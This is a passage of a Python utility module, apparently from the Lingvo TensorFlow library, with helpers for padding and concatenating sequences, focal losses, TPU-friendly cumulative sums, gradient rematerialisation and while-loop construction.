x: the tensor to be padded with shape [batch, seq_len, ...].
length: an int to specify the length to pad x to.
pad_val: an int or float used to pad x.
shape: an int array specifying the shape of the padded tensor if specified.
Returns:
The padded tensor with shape [batch, seq_len, ...], where
ret[:, :seq_len, ...] == x.
"""
if x.shape.ndims is not None:
rank = x.shape.ndims
assert rank >= 2
slen = GetShape(x, rank)[1]
pad_len = length - slen
pad = [[0, 0] for _ in range(rank)]
pad[1][1] = pad_len
else:
rank = tf.rank(x)
with tf.control_dependencies([assert_greater_equal(rank, 2)]):
slen = tf.shape(x)[1]
pad_len = length - slen
pad = tf.scatter_nd([[1, 1]], [pad_len], [rank, 2])
x = tf.pad(x, pad, constant_values=pad_val)
if x.shape.ndims is not None and isinstance(length, int):
static_shape = x.shape.as_list()
static_shape[1] = length
x.set_shape(static_shape)
if shape:
if not isinstance(shape, (list, tuple)):
raise TypeError('Shape must be a list or tuple.')
x = HasRank(x, len(shape))
x = tf.ensure_shape(x, shape)
return x
def PadSequenceTo(xs, padding, length, pad_val):
"""Pads `xs` and `padding` to `length` using `pad_val` along the 2nd dim.
Pads `xs` to `length` using `pad_val`, and `padding` using 1.
Raise error if `x.shape[:2]` and `padding.shape` are not the same.
Args:
xs: A Tensor or a list of Tensors of shape [batch, seqlen] or [batch,
seqlen, ...].
padding: A 0/1 Tensor of shape [batch, seqlen]. 1 is for padded locations.
length: A Python int, the length to pad to.
pad_val: A Python numeric, used for padding x.
Returns:
A tuple of padded xs and padding.
"""
if not isinstance(xs, (list, tuple)):
new_xs = [xs]
else:
new_xs = xs
res = []
for x in new_xs:
batch, slen = GetShape(x, 2)
padding = HasRank(padding, 2)
padding = HasShape(padding, [batch, slen])
new_x = PadSequenceDimension(x, length, pad_val)
res.append(new_x)
padding = PadSequenceDimension(padding, length, tf.cast(1, padding.dtype))
if not isinstance(xs, (list, tuple)):
assert len(res) == 1
return res[0], padding
else:
return tuple(res), padding
def ApplyPadding(padding, x, padded=None, broadcast=True, use_select=True):
"""Applies padding to a tensor.
This is preferable to using arithmetic means for masking out padded values
such as::
# Equiv to ApplyPadding(padding, x))
x *= 1.0 - padding
# Equiv to ApplyPadding(padding, new, old)
new = old * padding + new * (1 - padding)
Aside from just being easier to read and reason about, using this function
is friendly to quantized representations because it does not mix arithmetic
on the padding values with the values in the tensor being padded (which can
have a very different range than the 0..1 padding tensor).
In addition, this works around issues in quantized schemes where we are
guaranteed to have an exact 0 but not necessarily any other number (i.e. 1).
Args:
padding: Tensor of padding values where 0 == keep and 1 == pad.
x: Tensor to apply padding to.
padded: Optional. Values to include for padded elements. Defaults to zeros.
Must be the same shape as 'x' if specified.
broadcast: Whether to broadcast the padding shape to the shape of 'x'. You
almost certainly want this to be true as it matches how padding would be
expanded if applied arithmetically.
use_select: Controls whether padding is applied with a select-mask
(True/default) or arithmetically (False). Some platforms have a
sensitivity to one or the other and this is used to work around such
issues.
Returns:
A tensor with the same shape as x with padded values masked.
"""
padding = with_dependencies([
Assert(
tf.reduce_all(
tf.logical_or(tf.equal(padding, 0.0), tf.equal(padding, 1.0))),
[padding])
], padding)
if use_select:
if padded is None:
padded = tf.zeros_like(x)
if broadcast:
# Broadcast padding to the full shape.
padding = tf.cast(padding, x.dtype) * tf.ones_like(x)
return tf.where(padding > tf.zeros_like(padding), padded, x)
else:
result = x * tf.cast(1.0 - padding, x.dtype)
if padded is not None:
result += padded * tf.cast(padding, padded.dtype)
return result
def LengthsFromPaddings(paddings):
"""Computes lengths of each sequence in a batch, ignoring trailing padding.
Args:
paddings: a tensor with shape [batch, length].
Returns:
lengths tensor shaped [batch] containing the unpadded length of each
sequence in the batch.
"""
paddings = HasRank(paddings, 2)
paddings = tf.cast(paddings, tf.int32)
# Find the last unpadded value.
# Cannot just use tf.reduce_sum because there might be leading paddings.
# Everything after the last unpadded value has 1.0 - paddings == 0.0, so in
# the cumsum below they will have the same value.
cumsum = tf.cumsum(1 - paddings, axis=1)
same_as_last_element = tf.equal(cumsum, cumsum[:, -1:])
# Counting the number of elements with the same value gives us num_padded + 1
# and so counting the number that differs gives us num_padded - 1.
length = tf.reduce_sum(
1 - tf.cast(same_as_last_element, tf.int32), axis=1) + 1
# Special case for all 0 paddings.
all_zero_paddings = tf.equal(tf.reduce_sum(1 - paddings, axis=1), 0)
return tf.where(all_zero_paddings, tf.zeros_like(length), length)
def TrimTrailingPaddings(inputs, paddings):
"""Trims trailing paddings from inputs.
Since the number of dimensions is not fixed, this will not work on TPU.
Args:
inputs: a tensor with shape [batch, length, ...].
paddings: a tensor with shape [batch, length].
Returns:
Trimmed inputs and paddings. For compatibility reasons, the trimmed tensors
will always have length at least 1.
"""
paddings = HasRank(paddings, 2)
max_length = tf.maximum(tf.reduce_max(LengthsFromPaddings(paddings)), 1)
output_shape = tf.shape(inputs)
output_shape = tf.concat([[output_shape[0], max_length], output_shape[2:]],
axis=0)
outputs = tf.slice(inputs, tf.zeros_like(output_shape), output_shape)
out_paddings = tf.slice(paddings, [0, 0],
tf.stack([output_shape[0], max_length]))
return outputs, out_paddings
def ReversePaddedSequence(inputs, paddings):
"""Reverse inputs based on paddings.
Only reverse the unpadded portion of `inputs`. It assumes inputs are only
padded in the end.
Args:
inputs: a tensor of [seq_length, batch_size, num_input_nodes].
paddings: a tensor of float32/float64 zero or one of shape [seq_length,
batch_size, 1].
Returns:
A reversed tensor of the same shape as `inputs`.
"""
inversed_paddings = 1.0 - tf.squeeze(paddings, 2)
inputs_length = tf.cast(
tf.rint(tf.reduce_sum(inversed_paddings, axis=0)), tf.int32)
return tf.reverse_sequence(inputs, inputs_length, seq_axis=0, batch_axis=1)
def ConcatenatePaddedSequences(input0, input1, padding0, padding1, seq_dim=1):
"""Concatenates input sequences with varying lenghts as defined by paddings.
This is a helper function for concatenating 2 batches of input sequences,
where each example in the batch can have different lengths, as defined by
the corresponding paddings. To concatenate correctly, it makes use of
tf.reverse_sequence to partially reverse the sequences before
concatenating them together.
NOTE: We assume that the tensors have no leading paddings.
Args:
input0: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
input1: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
padding0: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input0.
padding1: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input1.
seq_dim: int, the time axis along which the tensors will be concatenated.
Should be 0 or 1. Assumes that batch_dim is 1 - seq_dim.
Returns:
The concatenation of input0 and input1, and the corresponding padding.
Raises:
tf.errors.InvalidArgumentError when seq_dim is not 0 or 1.
"""
if seq_dim != 0 and seq_dim != 1:
raise tf.errors.InvalidArgumentError(None, None, 'seq_dim must be 0 or 1.')
batch_dim = 1 - seq_dim
# inpu0 and input1 should have the same batch size and same rank.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim],
GetShape(input1)[batch_dim]),
assert_equal(GetRank(input0), GetRank(input1))
], input0)
batch_size = GetShape(padding0)[batch_dim]
# batch dimension of inputs and paddings should match.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim], batch_size),
assert_equal(GetShape(padding1)[batch_dim], batch_size)
], input0)
input0_seq_dim = tf.to_int32(
tf.tile([tf.shape(padding0)[seq_dim]], [batch_size]))
input1_seq_dim = tf.to_int32(
tf.tile([tf.shape(padding1)[seq_dim]], [batch_size]))
# LengthsFromPaddings assumes that paddings is of size [batch, max_length].
if seq_dim == 1:
seq_length0 = LengthsFromPaddings(padding0)
seq_length1 = LengthsFromPaddings(padding1)
else:
seq_length0 = LengthsFromPaddings(tf.transpose(padding0))
seq_length1 = LengthsFromPaddings(tf.transpose(padding1))
# We assume that the tensors have no leading paddings.
# TODO(arunnt): Concatenate tensors with leading paddings correctly.
seq_length0 = with_dependencies([
assert_equal(seq_length0,
tf.to_int32(tf.reduce_sum(1.0 - padding0, seq_dim)))
], seq_length0)
seq_length1 = with_dependencies([
assert_equal(seq_length1,
tf.to_int32(tf.reduce_sum(1.0 - padding1, seq_dim)))
], seq_length1)
# Concatenate input sequences.
reversed_input0 = tf.reverse_sequence(
input0, seq_length0, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_input1 = tf.reverse_sequence(
input1, input1_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat = tf.concat([reversed_input1, reversed_input0], axis=seq_dim)
concat_inputs = tf.reverse_sequence(
reversed_concat,
seq_length0 + input1_seq_dim,
seq_axis=seq_dim,
batch_axis=batch_dim)
# Concatenate paddings. Note that paddings are always a Tensor of 0s and 1s,
# so, unlike the inputs, we don't have to reverse padding1, we can simply
# concatenate reversed padding0 and padding1.
reversed_padding0 = tf.reverse_sequence(
padding0, input0_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat_padding = tf.concat([reversed_padding0, padding1],
axis=seq_dim)
concat_paddings = tf.reverse_sequence(
reversed_concat_padding,
input0_seq_dim + seq_length1,
seq_axis=seq_dim,
batch_axis=batch_dim)
return concat_inputs, concat_paddings
def Retry(*args, **kwargs):
return retry.Retry(*args, **kwargs)
# FailedPreconditionError: variables are not initialized.
# AbortedError: processes restarts.
# UnavailableError: Bad hardware status: 0x1
transient_tf_errors = (tf.errors.FailedPreconditionError,
tf.errors.AbortedError, tf.errors.UnavailableError)
def RetryOnTransientTfError(*args, **kwargs):
return Retry(transient_tf_errors, *args, **kwargs)
def PadOrTrimTo(x, shape, pad_val=0):
"""Pad and slice x to the given shape.
Args:
x: A tensor.
shape: The shape of the returned tensor.
pad_val: An int or float used to pad x.
Returns:
'x' is padded with pad_val and sliced so that the result has the given
shape.
Raises:
ValueError: if shape is a tf.TensorShape and not fully defined.
"""
if isinstance(shape, (list, tuple)):
expected_rank = len(shape)
elif isinstance(shape, tf.TensorShape):
if not shape.is_fully_defined():
raise ValueError('shape %s padding %s must be fully defined.' %
(shape, x))
expected_rank = shape.rank
else:
shape = HasRank(shape, 1)
expected_rank = tf.size(shape)
x = HasRank(x, expected_rank)
# If dim-i is less than shape[i], pads on the right shape[i] -
# dim-i. Otherwise, pads [0, 0] for dim-i.
pad = shape - tf.minimum(tf.shape(x), shape)
zeros = tf.zeros_like(pad)
x = tf.pad(x, tf.stack([zeros, pad], axis=1), constant_values=pad_val)
# If dim-i is larger than shape[i], we slice [0:shape[i]] for dim-i.
return tf.reshape(tf.slice(x, zeros, shape), shape)
def RepeatDim(tensor, multiple, axis):
"""Copies elements in tensor's axis "multiple" times, like np.repeat."""
# x = [[1, 2, 3], [4, 5, 6]]
# RepeatDim(x, multiple=2, axis=1) gives:
# [[1, 1, 2, 2, 3, 3]. [4, 4, 5, 5, 6, 6]]
# As a comparison tf.tile(x, multiples=[1, 2]) gives:\
# [[1, 2, 3, 1, 2, 3], [4, 5, 6, 4, 5, 6]]
if multiple == 1:
return tensor
t_shape = tf.shape(tensor)
tensor_dims = tf.concat(
[t_shape[:axis], [t_shape[axis] * multiple], t_shape[axis + 1:]], 0)
multiple_dims = tf.concat([
tf.fill([axis + 1], 1), [multiple],
tf.fill([tf.rank(tensor) - axis - 1], 1)
], 0)
return tf.reshape(
tf.tile(tf.expand_dims(tensor, axis + 1), multiple_dims), tensor_dims)
def StackTensorsRecursively(values):
"""Recursively stacks Tensors in a list of `.NestedMap`.
Args:
values: a list of `.NestedMap` or Tensors to stacks.
Returns:
A `.NestedMap` with stacked values or a stacked Tensor.
"""
flatten = [w.Flatten() for w in values]
stacked = []
for i in range(len(flatten[0])):
stacked += [tf.stack([flatten[j][i] for j in range(len(flatten))])]
ret = values[0].Pack(stacked)
return ret
def MixByWeight(inputs, weights, seed=None):
"""Returns a weighted random choice and bprop type from the give inputs.
Args:
inputs: a list of callables, where each callable returns a tf.Tensor or a
nested structure containing tf.Tensor. Function return types must be
consistent across elements. The tf.Operation to compute the result tensor
will only be invoked for one input at a time. For example, if each fn
represents an input record stream, a record will be drawn only from a
selected stream while the other streams will remain unchanged.
weights: a 1D tensor of float > 0 of the same length as inputs.
seed: random seed.
Returns:
A probablistic sample from the inputs proportional to the weights. The
return type will be the same as return type of individual 'fn' from the
inputs.
A one-hot vector of the source selected.
"""
weights = tf.convert_to_tensor(weights, dtype=tf.float32)
weights = with_dependencies([
assert_equal(tf.shape(weights), [len(inputs)]),
assert_greater_equal(tf.reduce_min(weights), 0.0)
], weights)
lower = tf.cumsum(weights, exclusive=True)
upper = tf.cumsum(weights, exclusive=False)
r = tf.random_uniform(shape=[], maxval=upper[-1], seed=seed)
return_input = tf.case(
[(tf.logical_and(lower[i] <= r, r < upper[i]), inputs[i])
for i in range(len(inputs))],
exclusive=True)
selected_index = tf.case(
[(tf.logical_and(lower[i] <= r, r < upper[i]), lambda i=i: i)
for i in range(len(inputs))],
exclusive=True)
bprop_index = tf.one_hot(selected_index, len(inputs), dtype=tf.float32)
return return_input, bprop_index
def CheckShapes(shapes):
"""Asserts that shapes is a tuple of NestedMap or tshape.Shape."""
assert isinstance(shapes, tuple), str(shapes)
for s in shapes:
if isinstance(s, NestedMap):
assert all([isinstance(t, tshape.Shape) for t in Flatten(s)
]), '{} contains non-tensor value.'.format(s)
else:
assert isinstance(s, tshape.Shape), '{}: {}'.format(type(s), s)
def FPropDtype(params):
return params.fprop_dtype if params.fprop_dtype is not None else params.dtype
def UpdateFpropDtype(params, fprop_dtype):
"""Recursively update the fprop_dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateFpropDtype(val, fprop_dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateFpropDtype(item, fprop_dtype)
elif key == 'fprop_dtype':
params.fprop_dtype = fprop_dtype
def UpdateDtype(params, dtype):
"""Recursively update the dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateDtype(val, dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateDtype(item, dtype)
elif key == 'dtype':
params.dtype = dtype
def NameScopeDecorator(name_scope):
"""Decorates a python function to introduce a tf.name_scope.
Example::
@py_utils.NameScopeDecorator('foobar')
def MyFoobarMethod(self):
# ... Do TF things
Args:
name_scope: The name scope to introduce.
Returns:
A function decorator.
"""
def Decorator(f):
def Wrapped(*args, **kwargs):
with tf.name_scope(name_scope):
return f(*args, **kwargs)
return Wrapped
return Decorator
def SequencesToDebugStrings(ids, lens, summarize=5):
"""Returns debug strings for the given sequences.
Args:
ids: int32 of [batch, len].
lens: int32 of [batch].
summarize: number of ids to summarize per sequence.
Returns:
A string tensor of [batch].
"""
num_seqs = tf.shape(lens)[0]
def _Body(i, result):
line = tf.strings.format('{}', ids[i, :lens[i]], summarize=summarize)
return i + 1, tf.concat([result, tf.reshape(line, [1])], axis=0)
i0 = tf.zeros(shape=[], dtype=tf.int32)
result0 = tf.constant('', shape=[0], dtype=tf.string)
_, strs = tf.while_loop(
lambda i, result: i < num_seqs,
_Body, (i0, result0),
shape_invariants=(i0.shape, tf.TensorShape([None])))
return strs
def RematerializeFn(fn, *xs):
"""Calls fn and rematerializes fn in the backward pass.
`fn(*xs) -> ys`, where xs and ys can be a single tensor or a tuple of tensors.
Args:
fn: A python function to be rematerialized in the backprop pass.
*xs: A single tensor or a list/tuple of tensors. `xs` are input args to the
fn function.
Returns:
`fn(*xs)`
"""
initial_step_seed = GetStepSeed()
final_step_seed = GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
def Backward(op, *dy):
"""The backward function that rematerializes forward outputs."""
always_true = tf.random.uniform([]) < 2.0
# Alternatively, can do this:
# tf.where(tf.is_nan(x),
# tf.constant(float('nan'), dtype=x.dtype) * tf.ones_like(x),
# x)
# Skip op.inputs[0] which is initial_step_seed.
bak_xs = [tf.where(always_true, x, tf.zeros_like(x)) for x in op.inputs[1:]]
for dst, src in zip(bak_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*bak_xs)
ResetStepSeed(final_step_seed)
dxs = tf.gradients(ys, bak_xs, grad_ys=dy)
dxs_final = []
for dx, x in zip(dxs, bak_xs):
if dx is None:
dxs_final.append(tf.zeros_like(x))
else:
dxs_final.append(dx)
assert len(dxs_final) == len(bak_xs)
return (tf.zeros_like(initial_step_seed),) + tuple(dxs_final)
xs_dtypes = [x.dtype for x in xs]
ys_shapes = []
# TODO(huangyp, yonghui): Check Forward doesn't use any stateful random ops.
@tf.Defun(initial_step_seed.dtype, *xs_dtypes, python_grad_func=Backward)
def Forward(initial_step_seed, *fwd_xs):
"""Forward function plus sanity checks."""
for dst, src in zip(fwd_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*fwd_xs)
# Some sanity check.
assert not function.get_extra_inputs()
assert not function.get_extra_args()
assert not function.get_extra_vars()
if isinstance(ys, tuple):
for y in ys:
assert isinstance(y, tf.Tensor)
ys_shapes.append(y.shape)
else:
assert isinstance(ys, tf.Tensor)
ys_shapes.append(ys.shape)
return ys
ys = Forward(initial_step_seed, *xs)
if isinstance(ys, tuple):
for y, s in zip(ys, ys_shapes):
y.set_shape(s)
else:
ys.set_shape(ys_shapes[0])
# TODO(b/129159299): The ResetStepSeed below is needed to work around this
# bug, which is a problem with global tensors being shared by different
# inference graphs. It should be replaced with the new step seed value
# returned from the Forward function when the bug is fixed.
ResetStepSeed(final_step_seed)
return ys
# A set of names of stateful random number generator ops.
# See tensorflow/core/ops/random_ops.cc
_STATEFUL_RANDOM_OPS = {
# pyformat: disable
'RandomUniform',
'RandomUniformInt',
'RandomStandardNormal',
'ParameterizedTruncatedNormal',
'TruncatedNormal',
'RandomShuffle',
'Multinomial',
'RandomGamma',
'RandomPoisson',
'RandomPoissonV2',
# pyformat: enable
}
def StatefulRandomOpsInDefun(func, graph=None):
"""Checks whether the Defun depends on stateful random number ops.
Stateful random number generator ops should be avoid in Recurrent() call.
Otherwise, these ops produce inconsistent values between FProp and BProp.
Args:
func: a _DefinedFunction to check.
graph: a Graph. Set None to use the default graph.
Returns:
A list of names of the stateful random ops.
Raises:
InvalidArgumentError: if the input func/graph is invalid.
"""
if not isinstance(func, function._DefinedFunction): # pylint: disable=protected-access
raise tf.errors.InvalidArgumentError(None, None,
'func is not a _DefinedFunction.')
if graph is None:
graph = tf.get_default_graph()
func.add_to_graph(graph)
graph_def = graph.as_graph_def()
# A dict from function name to FunctionDef.
func_defs = {x.signature.name: x for x in graph_def.library.function}
if func.definition.signature.name not in func_defs:
raise tf.errors.InvalidArgumentError(
None, None,
'Defun {} is not in the graph .'.format(func.definition.signature.name))
stateful_ops = []
# Recursively search for stateful random op.
nodes = py_collections.deque(func.definition.node_def)
while nodes:
node = nodes.pop()
assert isinstance(node, node_def_pb2.NodeDef), node
if node.op in _STATEFUL_RANDOM_OPS:
stateful_ops.append(node.op)
continue
def _AddDefunNodes(func_name):
"""If the given func_name is a Defun, add its sub-nodes into nodes."""
if func_name in func_defs:
nodes.extend(func_defs[func_name].node_def)
# For functional.{While|For|If} ops, add their Defun attr into search.
if node.op == 'While':
_AddDefunNodes(node.attr['body'].func.name)
_AddDefunNodes(node.attr['cond'].func.name)
elif node.op == 'For':
_AddDefunNodes(node.attr['body'].func.name)
elif node.op == 'If':
_AddDefunNodes(node.attr['then_branch'].func.name)
_AddDefunNodes(node.attr['else_branch'].func.name)
else:
# For other op, check whether itself is a Defun op.
_AddDefunNodes(node.op)
return stateful_ops
def ToPlaceholders(nmap, dtype=None):
"""Converts every Tensor in nmap to a placeholder."""
def _ToPlacerholder(x):
shape = [None for _ in x.shape[:-1]] + [x.shape[-1]]
return tf.placeholder(dtype=dtype or x.dtype, shape=shape)
return nmap.Transform(_ToPlacerholder)
def SoftmaxCrossEntropyFocalLoss(logits,
label_ids=None,
label_probs=None,
alpha=None,
gamma=None):
u"""Focal loss for multinomial (softmax) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the multinomial logistic regression. C is the
number of classes.
label_ids: [...]. Each entry in labels must be an index in [0, C).
label_probs: [..., C]. Each vector along last dimension must be a valid
probability distribution.
alpha: [C]. The weighting factor alpha. Eq (3) in [1].
gamma: []. Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
if label_probs is not None:
log_probs = tf.nn.log_softmax(logits)
loss = -(label_probs * log_probs)
if gamma is not None and gamma != 0:
probs = tf.exp(log_probs)
loss *= tf.pow(1.0 - probs, gamma)
if alpha is not None:
loss *= tf.reshape(
alpha, tf.concat([tf.ones(tf.rank(loss) - 1, tf.int32), [-1]],
axis=0))
loss = tf.reduce_sum(loss, axis=-1)
else:
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=label_ids, logits=logits)
if gamma is not None and gamma != 0:
probs = tf.exp(-loss)
loss *= tf.pow(1.0 - probs, gamma)
if alpha is not None:
loss *= tf.gather(alpha, label_ids)
return loss
def SigmoidCrossEntropyFocalLoss(logits, labels, alpha=None, gamma=None):
u"""Focal loss for binary (sigmoid) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the sigmoid logistic regression.
labels: [..., C]. 0/1 labels.
alpha: The weighting factor alpha. Eq (3) in [1].
gamma: Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
# [1] Eq (4).
#
# The numerically-stable way to compute
# log(p) for positives;
# log(1 - p) for negatives.
loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
if gamma is not None and gamma != 0:
# The modulating factor. Note that
# (1 - p)ˠ = [1 - σ(x)]ˠ = [σ(-x)]ˠ, for positives.
# pˠ = [σ(x)]ˠ, for negatives.
loss *= tf.pow(tf.sigmoid(logits * (1 - labels * 2)), gamma)
if alpha is not None:
# [1] Eq (3)
loss *= (alpha * labels + (1 - alpha) * (1 - labels))
return loss
_RECORD_FORMAT_RE = re.compile('(^[A-Za-z]+):(.*)')
def RecordFormatFromFilePattern(file_pattern):
"""Return the record format string for a Lingvo file pattern.
Lingvo file patterns take the form of:
tfrecord:/path/to/bar -> tfrecord is the record_format.
This function takes a file pattern and returns a string indicating
which format the filepattern implies.
Args:
file_pattern: String file pattern.
Returns:
Tuple (string, string):
- record_format: String record format, e.g., "tfrecord", etc.
- file_pattern: The file pattern without any prefixes.
"""
result = re.match(_RECORD_FORMAT_RE, file_pattern)
if result is None:
# TODO(vrv): Fix all callers so that file_pattern must contain
# the record format prefix.
return 'sstable', file_pattern
# regexp ensures that a match implies there are two groups:
# the record format and then the file pattern.
return result.groups()
def ReadFileLines(file_path):
"""Read a text file and return the lines.
If the file cannot be found at the given path, attempt to load it from the
Lingvo package (useful for data dependencies in par files).
Args:
file_path: path to file, either absolute or relative to the bazel workspace.
Returns:
A list of lines from the file.
"""
if not tf.io.gfile.exists(file_path):
try:
lines = pkgutil.get_data(
'lingvo', file_path.replace('lingvo/', '',
1)).splitlines(True)
except IOError:
# If pkgutil can't find the file, continue and let GFile raise the error.
lines = None
else:
lines = None
if not lines:
with tf.io.gfile.GFile(file_path, 'r') as f:
lines = f.readlines()
return lines
# Partially borrowed from
# https://github.com/tensorflow/tensor2tensor/blob/32929305e1a4ec926eff24123758b794df35492b/tensor2tensor/layers/common_layers.py#L349
def CumSum(x, axis=0, exclusive=False):
"""A TPU efficient implementation of tf.cumsum().
This is equivalent to tf.cumsum and is faster on TPU as of 08/2019 unless
the axis dimension is very large. The current Tensorflow implementation is
based on scanning and reducing which is not efficient on TPU.
Args:
x: An input Tensor.
axis: An int for the axis.
exclusive: A bool for performing exclusive cumsum.
Returns:
A Tensor of the same shape as x.
Raises:
ValueError: if the input axis is invalid.
"""
if x.dtype not in (tf.float32, tf.bfloat16) or not use_tpu():
# Fallback to tf.cumsum when inputs are not floats or not running on TPU.
return tf.cumsum(x, axis=axis, exclusive=exclusive)
rank = GetRank(x)
# Needs to know the rank for the final transpose if axis is not the last
# dimension. Otherwise, falls back to tf.cumsum.
if not isinstance(rank, int) and axis != -1:
return tf.cumsum(x, axis=axis, exclusive=exclusive)
if axis < -1:
if axis + rank < 0:
raise ValueError('Unexpected axis: %d (rank = %d)' % (axis, rank))
axis += rank
length = GetShape(x)[axis]
my_range = tf.range(length)
comparator = tf.less if exclusive else tf.less_equal
mask = tf.cast(
comparator(tf.expand_dims(my_range, 1), tf.expand_dims(my_range, 0)),
x.dtype)
result = tf.tensordot(x, mask, axes=[[axis], [0]])
if axis != -1 and axis != rank - 1:
result = tf.transpose(
result,
list(range(axis)) + [rank - 1] + list(range(axis, rank - 1)))
return result
def ProjectLastDim(inputs, weight, input_dim, output_dim):
"""Linear projection on the last dim of the input tensor.
This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
tensor by using Einsum for the compute.
Args:
inputs: An input Tensor, the last dimension of which is input_dim.
weight: A weight matrix with shape [input_dim, output_dim].
input_dim: An integer or a symbolic dim, the last dimension of the inputs.
output_dim: An integer or a symbolic dim, the last dimension of the outputs.
Returns:
An output Tensor of the same rank as inputs, the last dimension is
output_dim.
"""
input_dim = int(
symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
output_dim = int(
symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
) else output_dim)
# Assert input_dim and output_dim
inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
inputs)
weight = with_dependencies([
assert_equal(GetShape(weight)[0], input_dim),
assert_equal(GetShape(weight)[-1], output_dim)
], weight)
if (use_tpu() and inputs.shape is not None and
inputs.shape.rank is not None and inputs.shape.rank < 26):
# Avoids reshape if feasible and uses Einsum.
if inputs.shape.rank == 2:
outputs = tf.matmul(inputs, weight)
else:
s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
r = inputs.shape.rank
outputs = tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), inputs, weight)
else:
outputs = Matmul(tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight)
outputs = tf.reshape(
outputs,
tf.concat([
tf.cast(GetShape(inputs)[:-1], tf.int32),
ToStaticShape([output_dim])
],
axis=0))
return outputs
@contextlib.contextmanager
def RemoveAssertContext(remove=True):
"""Hacks to replace certain unwanted tensorflow ops."""
# TODO(zhifengc/huangyp): Consider implementing assert_equal
# op replacement for lingvo. As assert_equal doesn't support String on GPUs.
# Hack to replace tf.assert_equal
# TODO(b/136040013): Remove this after migration to tf.function.
if remove:
saved_assert_equal = tf.check_ops.assert_equal
# pylint: disable=unused-argument
def NoOP(*args, **kwargs):
return tf.no_op()
# pylint: enable=unused-argument
tf.check_ops.assert_equal = NoOP # Make assert_equal a no op.
yield
tf.check_ops.assert_equal = saved_assert_equal
else:
yield
def _DefineDefun(fwd, bak, args):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
bak: A callable xs, ys, dys: Nested Structure -> dxs: Nested Structure. The
custom backprop function for fwd.
args: A Nested Structure of tf.Tensor.
Returns:
A NestedMap w/ fields:
defun: A tf.Defun wraps fwd
args: A Nested Structure of tf.DType
rets: A Nested Structure of tf.DType
"""
assert fwd is not None
# fwd signature (tf.Tensor dtypes).
get_dtype = lambda x: x.dtype
sigs = NestedMap(args=Transform(get_dtype, args))
get_shape = lambda x: x.shape
arg_shapes = Transform(get_shape, args)
compiled = use_xla()
noinline = not compiled
def Backward(op, *args):
assert bak is not None
xs = Pack(sigs.args, op.inputs)
# Note: sigs.rets will be set during the Forward call.
ys = Pack(sigs.rets, op.outputs)
dys = Pack(sigs.rets, args)
with RemoveAssertContext(remove=noinline):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
@tf.Defun(*Flatten(sigs.args), python_grad_func=Backward, noinline=noinline)
def Forward(*args):
for arg, shape in zip(args, Flatten(arg_shapes)):
arg.set_shape(shape)
with RemoveAssertContext(remove=noinline):
rets = fwd(Pack(sigs.args, args))
sigs.rets = Transform(get_dtype, rets)
return Flatten(rets)
sigs.defun = Forward
return sigs
def CallDefun(fwd, bak, args):
"""Wraps fwd in a defun with custom gradient bak and calls it with args.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
bak: A callable xs, ys, dys: Nested Structure -> dxs: Nested Structure. The
custom backprop function for fwd.
args: A Nested Structure of tf.Tensor.
Returns:
A Nested Structure equivalent to what fwd(args) computes.
"""
sigs = _DefineDefun(fwd, bak, args)
flat_rets = sigs.defun(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
return Pack(sigs.rets, flat_rets)
def _Itype():
"""Loop iterator data type."""
return tf.int32 if use_xla() else tf.int64
def WhileLoop(cond, body, loop_state):
"""Helper to construct a while loop.
Args:
cond: A callable NestedMap -> tf.bool.
body: A callable NestedMap -> NestedMap.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(loop_state=loop_state)
dtypes = state.Transform(lambda x: x.dtype).Flatten()
@tf.Defun(*dtypes)
def LoopCond(*args):
s = state.Pack(args)
return cond(s.loop_state)
@tf.Defun(*dtypes)
def LoopBody(*args):
s = state.Pack(args)
s.loop_state = body(s.loop_state)
return s.Flatten()
return state.Pack(
